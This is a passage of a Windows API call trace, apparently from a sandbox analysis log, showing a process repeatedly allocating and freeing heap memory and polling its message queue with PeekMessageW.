(HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85910 [0273.513] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda6f0 | out: hHeap=0xcc0000) returned 1 [0273.513] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee55f8 [0273.513] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6f0 [0273.513] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2b8 [0273.513] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe859b0 [0273.513] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2b8 | out: hHeap=0xcc0000) returned 1 [0273.513] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe859b0 | out: hHeap=0xcc0000) returned 1 [0273.513] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.513] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5da0 [0273.513] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2b8 [0273.513] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe859b0 [0273.513] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2b8 | out: hHeap=0xcc0000) returned 1 [0273.513] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5f58 [0273.513] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2b8 [0273.514] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3f0 [0273.514] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85980 [0273.514] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3f0 | out: hHeap=0xcc0000) returned 1 [0273.514] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85980 | out: hHeap=0xcc0000) returned 1 [0273.514] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.514] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5cb0 [0273.514] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3f0 [0273.514] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85980 [0273.514] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3f0 | out: hHeap=0xcc0000) returned 1 [0273.514] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5620 [0273.514] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3f0 [0273.514] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda270 [0273.514] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe859a0 [0273.514] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda270 | out: hHeap=0xcc0000) returned 1 [0273.514] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe859a0 | out: hHeap=0xcc0000) returned 1 [0273.514] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.514] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5d00 [0273.514] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda270 [0273.514] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe859a0 [0273.514] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda270 | out: hHeap=0xcc0000) returned 1 [0273.514] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xddf388 [0273.514] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda270 [0273.514] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2e8 [0273.514] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85990 [0273.514] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda2e8 | out: hHeap=0xcc0000) returned 1 [0273.514] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85990 | out: hHeap=0xcc0000) returned 1 [0273.514] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee55d0 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda2e8 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85990 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xddaa20 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda450 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85970 [0273.515] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda450 | out: hHeap=0xcc0000) returned 1 [0273.515] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85970 | out: hHeap=0xcc0000) returned 1 [0273.515] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee5e40 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda450 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85970 [0273.515] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda450 | out: hHeap=0xcc0000) returned 1 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6390 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda450 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda318 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85940 [0273.515] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda318 | out: hHeap=0xcc0000) returned 1 [0273.515] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85940 | out: hHeap=0xcc0000) returned 1 [0273.515] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee63b8 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda318 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85940 [0273.515] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda318 | out: hHeap=0xcc0000) returned 1 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee63e0 [0273.515] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda318 [0273.516] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda498 [0273.516] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe858d0 [0273.516] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda498 | out: hHeap=0xcc0000) returned 1 [0273.516] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe858d0 | out: hHeap=0xcc0000) returned 1 [0273.516] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.516] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6408 [0273.516] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda498 [0273.516] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe858d0 [0273.516] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda498 | out: hHeap=0xcc0000) returned 1 [0273.516] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6430 [0273.516] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda498 [0273.516] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9af0 [0273.516] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85900 [0273.516] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9af0 | out: hHeap=0xcc0000) returned 1 [0273.516] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85900 | out: hHeap=0xcc0000) returned 1 [0273.516] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.516] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6458 [0273.516] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9af0 [0273.516] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85900 [0273.516] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9af0 | out: hHeap=0xcc0000) returned 1 [0273.516] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6480 [0273.516] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9af0 [0273.516] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9dd8 [0273.516] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85960 [0273.516] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9dd8 | out: hHeap=0xcc0000) returned 1 [0273.516] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85960 | out: hHeap=0xcc0000) returned 1 [0273.516] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee64a8 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9dd8 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85960 [0273.517] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9dd8 | out: hHeap=0xcc0000) returned 1 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee64d0 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9dd8 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda600 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85950 [0273.517] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda600 | out: hHeap=0xcc0000) returned 1 [0273.517] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85950 | out: hHeap=0xcc0000) returned 1 [0273.517] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee64f8 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda600 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85950 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9b20 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda630 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85920 [0273.517] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda630 | out: hHeap=0xcc0000) returned 1 [0273.517] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85920 | out: hHeap=0xcc0000) returned 1 [0273.517] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6520 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda630 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85920 [0273.517] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda630 | out: hHeap=0xcc0000) returned 1 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6548 [0273.517] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda630 [0273.518] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9d00 [0273.518] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe859c0 [0273.518] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9d00 | out: hHeap=0xcc0000) returned 1 [0273.518] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe859c0 | out: hHeap=0xcc0000) returned 1 [0273.518] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.518] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6570 [0273.518] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9d00 [0273.518] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe859c0 [0273.518] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6c0 [0273.518] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6a8 [0273.518] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe859d0 [0273.518] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda6a8 | out: hHeap=0xcc0000) returned 1 [0273.518] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe859d0 | out: hHeap=0xcc0000) returned 1 [0273.518] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.518] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6598 [0273.518] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6a8 [0273.518] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe859d0 [0273.518] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9bc8 [0273.518] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9dc0 [0273.518] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe859e0 [0273.518] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9dc0 | out: hHeap=0xcc0000) returned 1 [0273.518] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe859e0 | out: hHeap=0xcc0000) returned 1 [0273.518] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.518] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee65c0 [0273.518] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9dc0 [0273.518] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe859e0 [0273.519] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9dc0 | out: hHeap=0xcc0000) returned 1 [0273.519] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee65e8 [0273.519] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9dc0 [0273.519] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6d8 [0273.519] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe859f0 [0273.519] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda6d8 | out: hHeap=0xcc0000) returned 1 [0273.519] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe859f0 | out: hHeap=0xcc0000) returned 1 [0273.519] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.519] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6610 [0273.519] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6d8 [0273.519] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe859f0 [0273.519] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda6d8 | out: hHeap=0xcc0000) returned 1 [0273.519] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6638 [0273.519] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda6d8 [0273.519] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9d48 [0273.519] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85a00 [0273.519] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9d48 | out: hHeap=0xcc0000) returned 1 [0273.519] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85a00 | out: hHeap=0xcc0000) returned 1 [0273.519] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.519] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6660 [0273.520] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9d48 [0273.520] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85a00 [0273.520] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9d48 | out: hHeap=0xcc0000) returned 1 [0273.520] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6688 [0273.520] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9d48 [0273.520] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda300 [0273.520] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85a10 [0273.520] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda300 | out: hHeap=0xcc0000) returned 1 [0273.520] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85a10 | out: hHeap=0xcc0000) returned 1 [0273.520] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.520] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee66b0 [0273.520] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda300 [0273.520] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85a10 [0273.520] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda300 | out: hHeap=0xcc0000) returned 1 [0273.520] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf390a0 [0273.520] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda300 [0273.520] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3a8 [0273.520] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85a20 [0273.520] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3a8 | out: hHeap=0xcc0000) returned 1 [0273.520] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85a20 | out: hHeap=0xcc0000) returned 1 [0273.520] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.520] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee66d8 [0273.520] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3a8 [0273.520] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85a20 [0273.520] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda3a8 | out: hHeap=0xcc0000) returned 1 [0273.520] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6700 [0273.521] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda3a8 [0273.521] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9b08 [0273.521] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85a30 [0273.521] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9b08 | out: hHeap=0xcc0000) returned 1 [0273.521] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85a30 | out: hHeap=0xcc0000) returned 1 [0273.521] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.521] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6728 [0273.521] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9b08 [0273.521] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85a30 [0273.521] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9b08 | out: hHeap=0xcc0000) returned 1 [0273.521] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf390d8 [0273.521] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9b08 [0273.521] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda660 [0273.521] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85a40 [0273.521] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda660 | out: hHeap=0xcc0000) returned 1 [0273.521] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85a40 | out: hHeap=0xcc0000) returned 1 [0273.521] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.521] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6750 [0273.521] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda660 [0273.521] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85a40 [0273.521] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdda660 | out: hHeap=0xcc0000) returned 1 [0273.521] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee6778 [0273.521] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdda660 [0273.521] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9ac0 [0273.521] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85a50 [0273.521] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9ac0 | out: hHeap=0xcc0000) returned 1 [0273.522] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85a50 | out: hHeap=0xcc0000) returned 1 [0273.522] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.522] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee67a0 [0273.522] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9ac0 [0273.522] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85a50 [0273.522] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xdd9ac0 | out: hHeap=0xcc0000) returned 1 [0273.522] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee67c8 [0273.522] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xdd9ac0 [0273.522] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xddb620 [0273.522] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xe85a60 [0273.522] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddb620 | out: hHeap=0xcc0000) returned 1 [0273.522] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xe85a60 | out: hHeap=0xcc0000) returned 1 [0273.522] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.522] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xee67f0 [0273.522] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xddb620 [0273.522] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xe85a60 [0273.522] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xddb620 | out: hHeap=0xcc0000) returned 1 [0273.522] RtlAllocateHeap (HeapHandle=0xcc0000, 